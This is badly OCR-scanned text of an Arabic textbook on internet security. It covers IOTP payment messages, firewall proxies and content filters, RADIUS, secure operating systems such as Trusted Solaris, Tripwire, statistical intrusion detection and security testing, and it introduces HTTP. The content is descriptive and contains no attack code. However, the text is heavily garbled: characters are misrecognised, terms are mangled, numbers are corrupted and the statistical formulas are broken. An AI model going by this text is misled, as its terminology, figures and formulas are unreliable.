Offer Response Signature| )۱۰( 
چ‎ 


[Payment Exchange! ۽‎ 0» 


Payment Response (VY) 
Offer Response Signature (1¥) 
Payment Receipt Signature (18) 

سس سس سس هھ 








)1( التاجر . 0)المستهلك (t) ١‏ مناول الدفع . )£( وثيقة HTTP‏ 
)0( قائمة الار كة . )1( مجموعة قائمة العلامة التجارية . (V)‏ إستجابة الطلب . 
(۸) توقیع استجابة الطلب o‏ () طلب دفع. ١١‏ (۱) توقیع إستجابة الطلب . ۱ 
)1١(‏ تیار الدفع . (۱۳) استجابة الدفع . (۱۳) توقیع استجابة الدفع . (14) توقیع تسلیم الدع . 


فى هذه الحالة » Ob‏ تکامل مرکبات elas]‏ الماركة Brand Selection Compo-‏ 
nents)‏ لیس مضمونًا . وتعدیلها یمکن أن يسبب آنکار الخدمة فقط إذا كان بروتوکول 
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الدفع الأساسى مؤمن ضد تعديل الرسالة والازدواح وهجوم المقايضة swapping)‏ 
des . (attacks‏ أساس العلومات التى فى شكل الشبكة (Wep Form)‏ وخيارات 
الدفع التى تم انتقائها > فان التاجر ينشىء طلب » ويوقعه ويرسله للمستهلك . 
وبمعنى آخر » فان التاجر ينشىء رسالة 1017 تحتوى على : 
© بلوك عبر المرجع (Atrans Ref Block)‏ مع عبر حدد جديد (Trans Id)‏ . 
© بلوك git‏ إستجابة دفع (Offer Response trading block)‏ يحتوى على 

الرکبات التجارية التى تصف الطلب (مثل Mac‏ أو تاجر » أو وكيل 

دفع» أو طلب أو دفع ) . 
© بلوك ( قالب ) توقيع يحتوى على مركبة توقيع إستجابة طلب وشهادة التاجر فى مركبة 

شهادة . 

مركية البیع تتضمن مرجع ast‏ قائمة الماركة (Brand List)‏ ویمکن للمستهلك 
OW‏ فحص المعلومات من التاجر ويقدر إذا ما كان يرغب أن يستمر مع التجارة . وإذا 
كان كذلك ۰ فإنه ينشىء طلب abo‏ ليتم إرساله لوكيل الدفع . 

شكل ( ؛ ۳ ) يبين مثال لرسالة 1017 تحمل قالب تجارى طلب دفع . ويحتوى 
على المركبات التجارية التالية : 

(status) Jul ©‏ : معلومات ULI‏ ( الوضع ) عند نجاح أو فشل التجارة » 
منسوخة من قالب استجابة الطلب . 

© الدفع (payment)‏ : ينسخ أيضًا من قالب إستجابة الطلب ( تحتوى على مرجع 
لمركبة قائمة الماركة من قالب (IOTP‏ . 

(Organization) 241 ©‏ : معلومات تحديد المستهلك منسوخه من قالب 
.IOTP‏ 

ES! ©‏ : معلومات تحديد التاجر منسوخة من قالب 101۴ . 

© إختيار الماركة (Brand Selection)‏ : منسوخ من قالب إختيار TPO‏ (يعرف 
علامة الدفع » وبروتوكول الدفع والعملة والكمية ) . 
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توقیع استجابة الطلب (Offer Response Signature)‏ الذی تم تولیده سابقا 


يوافق عليه التاجر بالدفع . 


شکل )£ (T.‏ رسالة 107۳ طلب دفع 















Trans Ref Block 


)1( عبر قالب مرجع . Transaction Identifier‏ 
)1( محدد تعامل . Message Identifier‏ 

. محدد رسالة‎ (T) 

Signature Block . قالب التوقيع‎ )4( 
Offer Response Signature . توقيع استجابة الطلب‎ (6) 
Merchant's Certificate . شهادة التاجر‎ (1) 

(۷) قالب طلب الدفع . 


Payment Request Block 


۸) الوت 

Status ee 2 
. الدفع‎ (4) 

(۱۰) تاجر الهينة . Payment‏ 
)1( مستهلك الهيئة . Organization: Merchant‏ 


(۱۲) إختيار الماركة . 
(۱۳) رسالة JOTP‏ 


Organization: Consumer 
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بعد رسالة طلب الدفع » فإن واحدة أو أكثر من رسائل Jats‏ الدفع يمكن تبادها 
بين المستهلك ووكيل الدفع . هذا النوع من الرسائل يعمل لحمل بيانات محددة 
لبروتوكول الدفع الأساسى ( مثل A. CSET‏ إذا سار كل شىء جيدًا » فان وكيل 
الدفع يرسل رسالة إستجابة دفع تحتوى على قالب إستجابة دفع وقالب توقيع 
للمستهلك . وقالب إستجابة الدفع يحتوى على مركبة إيصال دفع » والتى تتضمن 
مرجع ASL‏ الدفع من الرسالة السابقة . خياريًا » فهى تحتوى على إيصال دفع ode‏ 


لنظام الدفع 1 
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مركبة التوقيع يمكن أن تحتوى خياريًا على توقيع استجابة طلب وتوقيع إيصال 
الدفع . وتوقيع إيصال الدفع يتضمن عناصر ختارة للمركبات التالية : 
© عبر مركية المحدد(10 (Trans‏ لرسالة 101۳ هذه . 
© عبر قالب المرجع لرسالة TOTP‏ 
© مركبة توقيع إستجابة الطلب . 
© مركبة إيصال الدفع . 
© مركبة الحالة . 
© مركبة إختيار العلامة . 
فى هذه الطريقة » فان الدفع مقيد لطلب التاجر خلال تعامل 101۳ . ويلاحظ 
أن بعض نظم الدفع تزود حاليًا هذه المناعة ( مثل توقیع مزدوج فى (SET‏ ۱ 
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Security 


Application Layer Security 
بخصوص الامن عند طبقة التطبيق . وكل‎ dole فى هذا الباب نتعامل مع مواضيع‎ 
كثيراً من الاهت‌ام عن ذلك‎ AST من المواضيع ذاتها عبارة عن جال واسع وهام ويستحق‎ 
هنا : على الأقل مفاهيم قليلة عامة سنقدمها هنا لمساعدة القارىء أن يبدأ فى التوغل فى‎ 
. المواضيع‎ 


e 


اسسا اسم : 

مع أن عنوان هذا الباب هو أمن طبقة التطبيق » ففى معظمه لن يتعامل مع 
تطبيقات الانترنيت المتعددة المدعمة بالأمن » وبدلاً من ذلك يعنون المواضيع الباقية عن 
البنية الأساسية لأمن الانترنيت . 

الجزء التالى يصف المجموعة الأخيرة لممرات تطبيقات آلیات AS‏ ومرشحات 
المحتوى الحزء الذى يليه تتعامل مع إطار الشبكة والذى يدعم تحكم الوصول والتوكيل 
والذی يمكن استعماله مع عديد من الآليات . وأمن نظام التشغيل هو موضوع هام e‏ 
المبنى على المضيف والذى سيذكر هنا هو الاتجاه التقليدى لكشف التطفل (الاقتحام)» 
أى الآلية مشروحة هنا Lal‏ كذلك » سنذكر بعض التطبيقات المدعمة بالأمن والمعروفة 
aie‏ 
ممرات اله لتطبيق ومرشحات التتحكم: 


مرات التطبيق هی آليات تستعمل بواسطة نظم الحاية (Firewall)‏ للتحكم فى 
الحركة التى تمر خلال مضيف محصن (bastion host)‏ عند طبقة التطبيق 
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(application layer)‏ . ويشار إليها غالباً كوكالات (proxies)‏ . والوكالة عبارة عن 
برنامج متوسط يعمل كخادم (Server)‏ (الموكل الأصلى) وعميل (للخادم الذى يرغب 
أن یربط به). فهو یقبل طلب من موکل ثم أى منها . 

lg ©‏ داخلیاً ویرسل استجابة للموکل » أو 

© يوجه الطلب لخادم آخر » أو 

© يترجم الطلب ويرسله لخادم آخر بالانابة عن الموكل . 

فى الحالتين فان الوكالة تستقبل الاستجابة وتوجهها للموكل . لكل خدمة والتی 
عا a‏ لح A‏ 
(FTP: TELNET‏ . وهذا الاتجاه يؤخذ بواسطة (Firewall Toolkit : FWTK)‏ مثلا 
بواسطة نظم (Trused Information Systems)‏ « والذى يمكن أن يستعمل ليناء 
حماية مفصلة . وبهذه الطريقة » من الممكن التعامل مع التحديدات لكل خدمة 
وبدون ضرورة تعريف فى مجموعة قواعد ترشیح قوالب غير متماسكلة عموماً . ولبعض 
الخدمات e‏ من الممكن إضافة توثيق وتحكم وصول (access control)‏ . 

مرشحات المحتوى (content filters)‏ هی برامج تنفذ على مضيفات الحاية 
وتعرب حركة على أساس علم دلالات الالفاظ لمستوى التطبيق (semantics)‏ . 
فمثلا» ما یسمی حوائط الفيروسات (viruses walls)‏ تبحث عن الفيروسات وتحجز 
فيض التطبيق إذا وجد أى منها . ومرشح المحتوى يمكنه أن يعرب رسائل البريد 
الالکترونی ويبحث عن عناوين من (From)‏ أو إلى (To)‏ ۰ أو عن نوع محدد من 
MIME zolo‏ . لازالت التحری تحجر Java applets‏ أو Java scripr‏ والتى ليست 
دائا ناجحة جداً . ولیس صعباً رؤية مرشح الحتوی هذا يمكنه إضعاف الناتج الكلى 
بدرجة كبيرة من o‏ إنترانيت (intranet)‏ » ولذلك يجب lel‏ بانتقاء . 
الفحص e "stateful"‏ وهو تكنولوجيا طورت ets‏ وتنمی الوكالة واتجاه مرشح 
المحتوى . وحدة فحص stateful‏ تستخرج الاتصالات الناسبة (أى العنوان أو رس 
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الموضوع) ومعلومات حالة التطبيق . ويمكن للوحدة أن تتعلم أى بروتوكول وتطبيق 
بتعريف قواعد الأمن فى INSPECT‏ ۰ وهی US‏ نص مستوى عالى بتوجيه هدف . 
نظم الفحص Stateful‏ يمكنها أداء دخول (logging)‏ وتوثيق عند طبقة التطبيق 
بتسجيل عناوين IP‏ للمصادر وجهات وصول القوالب( (Packets‏ » وأرقام النافذ 
(port numbers)‏ وأى معلومة آحری مطلوبة لتحديد إذا ما كانت القوالب تستجيب 
لسياسة أمن الموقع . معلومات الحالة وسياق الكلام تختزن فى جداول ربط ديناميكية . 

التوكيل وتحكم الوصول: 

يعد الوكيل الذى يتصل بخادم باستعمال المثال . مثل PPP‏ أو TELNET sl SLIP‏ 
قد تم توثيقه بنجاح » يجب على الخادم أن يقول إذا ما كان الوكيل قد تم توكيله بذلك 
الربط . كثير من منتجات الحاية تنفذ RADIUS‏ أو TACACS‏ للتوثيق والتوکیل . . 

فى «RADIUS‏ فان الخادم (Server)‏ الذى یربط به الوکیل یشار إليه کخادم وصول 
شبكة ¿NAS network access server) (NAS)‏ وکیل pole‏ مؤسس على UDP‏ 
RADIUS‏ والذى يتحكم فى قاعدة بيانات تحتوى على معلومات توثيق ps‏ 
NAS‏ قرر معلومات توثيق يق الوكيل لخادم RADIUS pias RADIUS‏ يمكنه أن 
يدعم أى كلمة سر مؤسسة على al‏ توثيق » مثل siSHAP Í PAP‏ دخول UNIX‏ . 
فهو يتحقق من كلمة سر الوكيل ويفحص توثيق توكيلها للخدمة التى يطلبها الوكيل 
عند ANS‏ (مثل PPP‏ أو SLIP‏ أو (TELNET‏ . وعندما تستقبل NAS‏ الاستجابة » 
فإنها تزود الوكيل بالخدمة إذا كانت الاستجابة موجبة أو ترفضها إذا كانت الاستجابة 
سالبة . 

كل التعاملات بين NAS‏ وخادم RADIUS‏ يتم توثيقها خلال استعال الخادم 
المشارك» والتى لا ترسل بتاتا خلال الشبكة . بالاضافة لذلك » فان كلمات سر الوكلاء 
ترسل مشفرة بين NAS‏ وخادمات RADIUS‏ لالغاء خطورة تصلب كلمة السر 


. (password) 
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أمن نظام التشغيل : 

نظم التشغيل معقدة جداً حتى يمكن تحديدها وتحقيقها منهجياً . ونتيجة لذلك » 
فمن المستحيل جعلها آمنة بدرجة محكمة . ومع ذلك » توجد بعض الآليات لتحسين 
أمن نظم التشغيل . وإحدى المشاكل الصعبة مع كثير من نظم التشغيل التجارية هى 
الاذن للمستعمل الفائق (Superuser)‏ . وللمستعمل الفائق كل أنواع لحقوق الوصول 
لكل موارد النظام . والنتيجة » إذا أمكن لشخص أن يكتسب حقوق مستخدم فائق فى 
نظام » فلا توجد طريقة لحاية أى من موارد النظام . فى البيئات الحربية» تستعمل 
موديلات تحكم وصول SÍ‏ فى مقاومتها e‏ مثل موديم Bell - La Padula‏ . وهذا 
الموديل يعرف سياسة أمن متعددة المستويات . وكل تابع (مستخدم) تحدد له علامة 
أمن تسمی خلوص (clearance)‏ تعرف مستوى أمن الوكيل . وكل موضوع (مورد) 
تجدد له علامة أمن تسمى تصنيف (classification)‏ أو حساسية (sensitivity)‏ 
تعرف مستوى أمن الموضوع . 

كذلك يمكن لوكيل قراءة موضوع فقط تصنيفه أقل أو مساوى لخلوص الوکیل . 
كذلك يمكن لوكيل أن يكتب فى موضوع فقط إذا كان تصنيف الموضوع أعلى أو مساوى 
لخلوص الوكيل . وهذا النوع من تحكم الوصول يشار له بتحكم وصول إجبارى . 
وتلك السياسات الأمنية مفيدة جدا لعظم البيئات الغير حربية . 

فى نظام تشغيل آمن » فإن كل الوصول للموارد (الأشياء) متوسطة بين مركبة موثوق 
ہا وأخرى مقاومة للعبث تسمى مراقبة مرجع ER . (reference monitor)‏ أن 
مراقبة المرجع تقوى سياسة الأمن : ومراقبة المرجع يفحص بالنسبة للخلوص والتصنيف 
فى قاعدة بيانات بتحكم وصول . المراقبة وقاعدة البيانات ووظائف الأمن المناسبة 
الأحرى هی جزء من نواة المن «(security kernel)‏ بوضع هذه الاجزاء داخل نواة 
الأمن والعزولة ومصححة ومقحمة دائ] » فان وظيفة الأمن / المناسبة مفصولة Elo‏ 
عن وظائف التشغيل GM‏ . وإذا كانت نواة الأمن صغيرة فهى أسهل كثيرا للتحقق 
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عن نظام تشغیل JAS‏ . بعض نظم التشغيل التجارية « مثل Trusted solaries‏ 
بواسطة Sun Microsystems Inc‏ »> تقدم إمكانية لعمل علامات الأمن ونحكم 
الوصول الاجبارى بالإضافة لتحكم الوصول التقديرى المعتاد . ومن الممكن تجاوز 
تحكم الوصول التقديرى بإعطاء حقوق أو إمتيازات لبرامج وتوثيق لمستعملين . وهذه 
يمكن حدیدها بطريقة ما بحيث أن أدنى ( أى الأقل ) حق فقط أو توثيق هو الذى 
يعطى . لهذا النظام » يعرف 83 إمتياز مختلف » لذلك فليس من الضرورى لبرنامج أن 
da,‏ بامتیازات ( أصل ) المستعمل الفائق SET LEY‏ محددة . هذا المفهوم هو تحسين 
بالتأكيد » ولكن بمجرد وجود طريقة لتجاوز تحكم الوصول التقديرى » فتوجد طرق 
كثيرة لامجاد حل وسط للنظام . وقد تم الاعتراف ب 2.5.1 Trusted Solaris Version‏ 
فى المملكة التحدة لتلبية إحتياجات 115170 لستوی لصحة التأكيد 3 E‏ والانواع 
الوظيفة ۰۳-1 2 ۴-٥‏ . واحتیاجات الستوی تعرف کا یل : 
© 83 : الوثائق التالية يجب أن تزود للتقييم : الوصف الغير رسمی للتصمیم 
المعمارى» والاختصار الوظيفى الناجح ۰ والوصف الغير رسمى للتصميم 
التفصيلى » ونظام التشكيل والتحكم وإجراءات التوزيع المعتمد وشفرة المصدر 
ورسومات الاجزاء الصلبة (hardware)‏ . 
F-B1 ©‏ : هذا مكافء ل 81 U.S TECSEC class‏ وتحتاج علامات حساسية 
وتحكم وصول وتحكم وصول إجبارى . 
F-C20‏ : هذا مکائیء ل U.S TOSEC class C2‏ ويحتاج تحكم وصول تقديرى 
حذر يتحبب دقيقًا » ويمكنه جعل المستخدمين مسئولين عن أعالهم خلال 
إجراءات التحديد » والتدقيق فى الأحداث ذات الصلة بالأمن وعزل المورد . 
كذلك « فإن Trusted Solaris‏ تعمل أيضًا وفق TSIX (re) 1.1 (Trusted Sys-‏ 


Trusted : بواسطة‎ tems Information eXchange restricted environment) 
Systems Interoperabitity Group (TSIG) 
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6 عبارة عن منتدى لبائعى الحاسبات الآلية » ومكملى نظم ومستخدمین 
طرفيين مكدسين لزيادة التشغيل البينى لنظم الحاسبات الآلية موثوق به . مجموعة وثيقة 
TSIX (re) 1‏ تحتوى على الوثائق [5] العمل فى تقدم التالية : 
© خیارات الأمن ۴[العامة (CIPSO)‏ : 

(Common IP Security Options) 

تسمح للملحق لخواص الأمن المحددة المصاحبة للبيانات فى قالب "IP Packet"‏ . 

: SAMP بروتوكول تعديل خواص امن‎ © 
(Security Attribute Modulation Protocol) 

تستعمل لاصرار خواص الامن بين المضيفات (hosts)‏ . 

SATMP : الامن‎ zoll بروتوكول تشكيل توكين‎ © 
(Security Attribute Token Mapping Protocol) 

يسمح للمضيفات Ob‏ تقلل خواص الامن إلى 32 توكين رقم ثنائى لنقل الشبكة . 
© مشترك it,‏ التطبيق Application Programming Interface]‏ [ 

(ibt 6 )3«((‏ هى مكتبة روتين يستعملها التطبيق للتحكم فى نقل الخواص أثناء 
إتصالات معالجة بينية موثوق بها . 
© التطبيقات الوئوق (Trusted Applications : APPS) ly‏ 

ستعطى زيادات لتطبيقات الشبكة العامة مثل تطبيقات telnet , multilevel,‏ 
rlogiv, rsh, ftp.‏ 
© نظام ملف شبكة موثوق (Trusted Network File System: TNES)L‏ 

يصف الزيادات لبروتوكول ۷2 نظام ملف الشبكة (NES)‏ والذى يدعم وصول 
ملف الشبكة فى بيئة شبكة أمن متعددة المستوى . 
9 الإدارة الموثوق (Trusted Administration : TADMIN)L-‏ 

تجعل من الممكن لادارة الوسائل الموثوق بها فى بيئة موزعة غريبة المنشأ . 
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نظام التشغيل الآمن يمكنه أيضًا إستعمال آليات تشفير . فمثلاً » بيانات تحكم 
الوصول يمكن تشفيرها بحيث تكون مراقبة المرجع فقط هی التى لها مفتاح التشفير لحل 
شفرتها . بعض نظم التشغيل تحسب MAC‏ لكل ملف ذو حماية . قيم MAC‏ يتم 
فحصها عند فترات منتظمة » ويجب ألا تتغير إلا إذا كان ملف قد تغير بواسطة 
مستخدم شرعى . وهذه الوظيفة تم تقديمها بواسطة برنامج Tripwire‏ والذى يمكن 
تركيبه على برامج (platforms)‏ ختلفة (أى مع نظم تشغيل ختلفة ) . وعندما ينفذ 
للمرة الأول » فان قاعدة بيانات خط قاعدة موقعة رقميًا أو "snapshot"‏ لنظام الملف 
يتم إنشاؤه من ملف السياسة . وعندما ينفذ برنامج Tripwire‏ مرة أخرى e‏ فإنه يقارن 
الملفات الفعلية مع قاعدة بيانات خط القاعدة » محددًا أى تغييرات أو إضافات أو 
إلغاء . وإذاتم اكتشاف انتهاك سياسة > فان برنامج Tripwire‏ سيرسل تقرير بريد 
إلكترونى لكل الأطراف المناسبة . 

مجموع "Open BSD"‏ المفتوحة يقدم برنامج متعدد "multiplatform"‏ مجانى لنظام 
BSD-based UNIX-like Las‏ 4.4 لنظام The Open BSD Lasst‏ مدعم 
بوظيفية أمن متضمنة تشهير قوى < IPsec , Open SSH, Kerberos IV, Jie‏ 
ISAKMP‏ . فهو ليس معرضًا لأى تعلییات التصدير منذ أسست مجموعة Open‏ 
0 فى كندا . المجموعة ها فريق تدقيق أمن والذى يبحث بصفة مستمرة لفجوات 
آمن جديدة (أساسًا تنفيذ التعرض للهجوم والأخطاء) . وعند وجود فجوة فهو يثبت 
e ie‏ والتثبيت يحرر فى الحال . والجموعة تسمى هذا الاتجاه «الأمن سابق BLES‏ 
كشف التطفل المؤسس / على مضيف : 

كشف التطفل » فتوجد أفكار عامة لكشف التطفل ID‏ نظم (11 ZU‏ مؤسسة 
فى الحقيقة على كلا المضيف (host)‏ وشبكة ID.‏ المؤسسة على مضيف هی الاتجاه 
التقليدى لكشف التطفل . فهو أساسًا po‏ بحاية نظام التشغيل على أساس 
تسجيلات الصوت ( تسمى كذلك ذيول التدقيق ) "audit trails"‏ وتختزن عادة فى 
ملفات سجل الأحداث . 
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ستحلات التدقيق : 

سجل الأحداث (audit record)‏ هو مدخل نسق مدد يتولد عند idos elt]‏ 
حرجة بواسطة أشخاص على شىء . وهذا النوع من سجل التدقيق يشار إليه dole‏ 
کسجل تدقیق محدد الکشف بعکس سجل التدقیق N‏ > والذى هدفه هو جمع 
معلومات عامة عن نشاط الستخدم » أساسًا لاغراض الحاسبة . الانکار (denying)‏ 
یعرف سجل تدقیق ومبين فى جدول (۱-۱۵) . سجل التدقیق یقول أن الشخص GAN‏ 
al‏ عمل de‏ شیء سجل التدقیق عند الزمن العطی بعلامة الوقت . ویعر عن 
الزمن کثوانی واالة الستثناة تنتح من النظم العاملة عند الرجوع من العمل . العمل 
والوارد المحددة فى Resource Usage Field‏ « عندما حاول الستخدم سمیث قراءة 
نص سری فى ملف ۰ ظهر انتهاك قراءة لأنه ليس له سماح بقراءة اطلف . ول يتم قراءة 
السجل : (RECORD=0)‏ وحدث الفعل فى يوم الاربعاء 22 دیسمبر 1999 عند 
14:33:18 


أنواع المقتحمين : 
تقرير أندرسون يعطى ثلاثة أصناف للمتطفلين (للمستخدمين المزيفين) : 
جدول )0 1( : سجل التدقيق 


استعيال موارد | الاستثناء 5 شخص 


Subject Exception | Resource 
Condition | Usage 


syst t 
القراءة‎ 
read RECORDS | 9548954 
violation 
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© المتنكر (masquerrader)‏ : هو شخص غير موكل يقتحم ASE‏ وصول نظام 
© الخارقون للقانون (misfeasor)‏ هو مستخدم قانونى يصل لوارد ليس موكل 
لما( أو بطريقة لیس موكلا cu‏ أو يسىء استعال الوصول للموارد الوکل 
للوصول ها . 
© المستخدم سرى ya (clandestine)‏ شخص il‏ التحكم الاشراق لنظام التشغيل 
ويستعمله للهروب من التدقيق . 
والتنکر dole‏ خارجى أو خارق للقانون » ويمكن أن يكون داخلى ومستخدم 
۰ سری) . 
کشف الاقتحام الاحصانی : 
الجزء السابق ذکره به ثلاثة آنواع لطرق ( 10) الاحصائية . 
© طرق الکشف الشاذة تکتشف إنحرافات عن نماذج الاستعمال السابق ( آی اللمحة 
المختصرة عن الستخدم» الانحراف Jaw gill‏ والعیاری ) . 
© طرق الكشف الأولى تستعمل قيم أولية لرات حدوث قيم محددة ( أى عدد محاولات 
الدخول الفاشلة ) . 
© طرق الربط تقارن أحداث تيدوابدون علاقة وتبحث عن علاقة مريبة ( مثل زمن 
CPU‏ ووحدات 1/0 المستعملة بواسطة برنامج أو عدد مرات الدخول وفترة دورة 
الدخول . 
أساسًا ob‏ الاقتحام الاحصائی یستعمل طرق إحصائية لتولید قيم ونیاذج والعتادة 
لنظام محدد . فمثلا » فى الودیل التوسط والعیاری يلاحظ ومتغیر عشواتی × بحيث 
أن قیم عددها n‏ من اللاحظات» قيم Xni‏ » فان [2 ,.... ,1] = يتم الحصول علیها . 
وهذه الطريقة تطبق لعدادات الأحداث » وموقتات الفترات وإجراءات الورد المتراكمة 


Ww 


عبر فترة زمنية ثابتة أو بين حدين بینها the‏ . الانحرافات المتوسط والعيارى S,M‏ 
يتم حسابها كما يل : 
م/م M=(X 1+X2..X‏ 


S = (X4 + x + E 
۳9 AMA عب‎ 

Les‏ أساس الموديل » فمن الممكن تحديد إذا ما كانت ملاحظة جديدة 1 + 1 “غير 
طبيعية بالنسبة للملاحظات السابقة . الملاحظات الحديدة تعتير غير طبيعية إذا وقعت 
خارج فترة ثقة ] pal [M-dxs, M+dxs‏ ماه . فترة الثقة هی فترة bre‏ كل ملاحظة 
قد تم تقديرها لتقع . ومن الواضح » إذا كانت 0 طويلة جّا » فمن الصعوبة أن أى 
ملاحظة ستقع خارج فترة الثقة المقابلة . lias‏ يعبر عنه بعدم التساوى chebyshev‏ « 
والذی يكر اساسا أن أى ملاحظة تقع خارج فترة الثقة فى الغالب هی 1/42 . مثل e‏ 
ل 4=ل. فان الاحتال عند 6.25% . 

إذا كانت القيمة التى لوحظت هی عدد محاولات الدخول الفاشلة فى الساعة c‏ 
فمن الضروری آولاً تیاس هذا الرقم لعدد ساعات 1 ؛ بحيث يتم تغطية فترة 
زمنية طويلة . متوسط وعیاریات الانحرافات ستعتمد بوضوح على عدد الستخدمین 
القانونیین . 
تطبیقات الانترنیت التی یدعمها الأمن : 

توجد تطبیقات مدعمة بالامن تستعمل فى الانترنيت . ومن المؤكد أن العروفة 
والمستعملة أكثر هی البرید الالکترونی (6-52211) والشبكة العالیةه ۷ (world wide‏ 
Jan. WWW)‏ مفاهيم الأمن ll‏ رسائل البريد الالكترونى هی : 
MIME, PGP‏ / 5 
اختبار الأمن : 


تقييم الأمن يذكر فى أمن نظام التشغيل . وتقييم الأمن واختبار الأمن هام » لكل 
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أنواع التطبيقات الامنة أساسًا » يوجد نوعان من الاختبار : 

© اختبار الصندوق الأسود » وفيه يقارن خرج البرنامج مع الدخل . 

© إختبار الصندوق AN‏ » وفيه امیکل الداخلى للنظام وسلوكه يتم إخختيارهما 
(أى إختيار المصدر / المفتوح ) . 

إختبار الصندوق الأبيض هو المطلوب أكثر وكذلك يستهلك وقت أطول من إختبار 
الصندوق الأسود » ولكن فهو يبوح كثيرًا بالأعطال المختفية والشفرة الزائفة . فمعظم 
الشركات لايمكنها تحمل عمل إختيار الأمن بنفسها . لذلك ٠‏ فهى اما ترسلها 
لشركات متخصصة ف الاختبارات » أو تستعمل بعض أدوات الاختبار المميكنة 
المجانية (Domus IT Security Laboratory , Gyygna Com Solu-. Sa.‏ 
tion Info Gard)‏ هى oles‏ معتمدة من المعهد الأهلى الأمريكى للمعايير 
والتكنولوجيا لاختبار وحدات تشفير . فى أوربا » فان Debis Systemhavs‏ هی شركة 
معروفة جيدًا تقدم خدمات إختبار أمن . ومثال أداة تصرف الاختبار المجانية هو 
5 والتی تصيد زمن تصرف التنفيذ لتطبيقات Java‏ « و applets‏ بعمل 
تتبعات تنفيذ . أداة إختيار الحاية المميكنة ثم تطويرها پواسطة NIST‏ ووكالة الأمن 
الأهلية (National Seuarity Agency)‏ ومثل فحص النوع فى old‏ البرمجة » فان 
طرق الاختيار يمكنها عمومًا أن OSG‏ ديناميكية أو ستاتيكية. طرق الاختبار 
الاستاتيكى (Static testimg)‏ تستعمل فى إختبار الصندوق الأبيض لايجاد العيوب 
وامیاکل atl‏ . طرق الاختيار الديناميكى تستعمل لاختبار التصرف الديناميكى 
لبرنامج ( أى عند تنفيذ البرنامج ) . dy‏ إختبار الصندوق الأنيض الديناميكى يمكن 
إستعمال وسيلة أجهزة أو أكثر والتى تدخل قطع إضافية لشفرة داخل برنامج حتى 
ندرس تصرفه. أمثلة وسائل الأجهزة هى التوكيد وحقن العطل . والتوكيدات 
(assertions)‏ عبارة عن عبارات تفحص حالة البرنامج بعد تنفيذ إحدى التعليات . 
وإذا وصلت حالة غير آمنة » فان سياسة أمن البرنامج قد يتم إنتهاكها . حقن العطل 
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مؤسس على تحليل تأثير إفساد حالة بيانات أثناء تنفيذ برنامج . كذلك يمكن استعاله 
لمحاكاة الحساب الغیر صحيح للبرنامج . بهذه الطريقة فإن تأثير العيب الكبير على 
أمن البرنامج يمكن ALLE‏ 


1 








Transfer 
Protocol 





Hypertext Transfer Protocol 

هذا OUI‏ يقدم بروتوكول نقل لنص غير "Hypertext Trausfer Proto- ls‏ 
<col" (HTTP)‏ والذى يستعمل لاتصالات خادم / تابع على الشبكة (Web)‏ 
كذلك سنتكلم عن أمن HTTP‏ ومفهوم ال حل الموجود . وللدهشة » لا يوجد حل محدد 
للأمن ل HTTP‏ منتشر فى الاستعال » بخلاف مشروع توثيق HTTP‏ 
تقسدیم : 

لشبکة عبارة عن نظام معلومات موزعة بتوی Je LALA‏ + 
© خادمات (Servers)‏ تختزن موارد العلومات . 
© وکلاء يمكنهم استقبال هذه العلومات 
© بروتوکول یستعمله الوکیل والخادمات للاتصالات HTTP)‏ . 
© تقلیل تسمية لتحدید موارد العلومات . 
@ تعریف نسق Sl etl‏ یمکن Wats‏ 

تقليد التسمية مؤسس على مراجع تسمى محددات الموردالشامل Universal Re-)‏ 
(source Identifiers‏ والذى يمكن إعطاؤه كموقع المورد الشامل (URL)‏ 
(Universal Resource Locator)‏ أو إسم المورد الشامل Universal Resource)‏ 
(Name : URN‏ عبارة عن وصف يبدأ Her‏ شكل مطلق) باسم مشروع scheme)‏ 
leds (name‏ على بعضهماء http‏ هو المشروع الافتراضی . بعض المشاريع 
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VI‏ 5 تعرف Lal‏ بواسطة معظم المتصفحين (مثل (Adap? ftp)‏ » ولكنها تعنون 
بمواصفات HTTP‏ . وکا أشرنا > يجب على الخادمات (servers)‏ أن تعرب URI‏ 
بعناية» Y‏ من الممكن أحياناً بناء URI‏ بطريقة بحيث of‏ محاولة لعمل إيذاء (مثل 
استرجاع شىء) تسبب إقحام العمليات التى بها تلف جسم فى الخادم . 

HTTP‏ يعرف أليتان للتوثيق » أساسية ومختارة » وهما بعيدتان عما يكفى لتلبية 
إحتياجات أمن تعامل الشبكة. والشبكة يشار إليها We‏ كنظام معلومات 
«وسائط غير تتابعية (hypermedia)‏ لأن HTTP‏ يمكنه نقل الوثائق الالكترونية فى 
انساق كثيرة مختلفة (أنواع وسائط) image/« audio / basic. text / html Ho)‏ 
.Cimage/peg« gif‏ هذه اللغة الأصلية لانشاء وثائق الشبكة Hyper a (Web)‏ 
Text Markup Language HTML‏ » وهی تعرف عموعة مثبتة من ODM‏ 
(Tags)‏ والتى تصف ade‏ مثبت من العناصر (مثل <SCRIPT «<FONT>‏ 
Markup Language (XML) S&L HTML. <PPLET>‏ المتدة تجعل من 
الممكن تعريف ألقاب جديدة ¿(tags)‏ لان XML‏ هی لغة تحول Markup Lan-4:U‏ 
6 والتى تعريف سياق الكلام للأخرى لغات ieee Markup Language‏ 
للمجال . المتصفح تعلم عن GW‏ من وثيقة XML‏ أو من تعريف نوع ملف وثيقة 
XML (Document Typp Definition : DTD)‏ عبارة عن جموعة فرعية للغة 
„Standard Generalized SGML Markup Language‏ ومجموعة عمل التوقيعات 
الرقمية IETF XML‏ هی مواصفات تطوير لتوقيع XML‏ والذى يمكن تصبيقه لحزء 
أو كل وثيقة ¿XML‏ 
بروتوكول نقل نص غير تتابعى: 

HTTP‏ عبارة عن بروتوكول خادم (وكيل (Client / server‏ (مثل استجابة طلب) 
والذى وزع وسائط غير تتابعية متعاونة » ونظم معلومات وسائط غير تتابعية . ويمكن' 
إمتداده بطلبات جديدة خلال تعريف طرق جديدة وعناوين . ويجب تنفيذه على قمة 
بروتوكول نقل يعتمد عليه ¢ مثل ۲٥۴‏ . 


Ve 


شكل )1.1( : مفهوم HTTP‏ الأساسى 


(o) Internet 


(4) Client Origin server (A) 


ÍA سس‎ 
(y) User Shared (£) 
cache cache 





)1( وكيل الستخدم ‏ (2) ذاكرة المستخدم (المؤقتة) (۲) وکاله )£( ذاكرة مشاركة (مؤقتة) 
)0( انترنست )1( طلب (Y) HTTP‏ استجابة (a) HTTP‏ خادم ol‏ (1) وکیل 


HTTP‏ هو (Stateless?‏ جيدة ما يعنى أن الخادم bat Y‏ معلومات بين 
التوصيلات » HTTP‏ إصدار 1.1 يدعم الربط المتواصل ۰ وعلی عکس HTTP‏ إصدار 
0. خصوصاً » واحد أو أكثر من زوج طلب / استجابة يمكن تبادله خلال الربط 
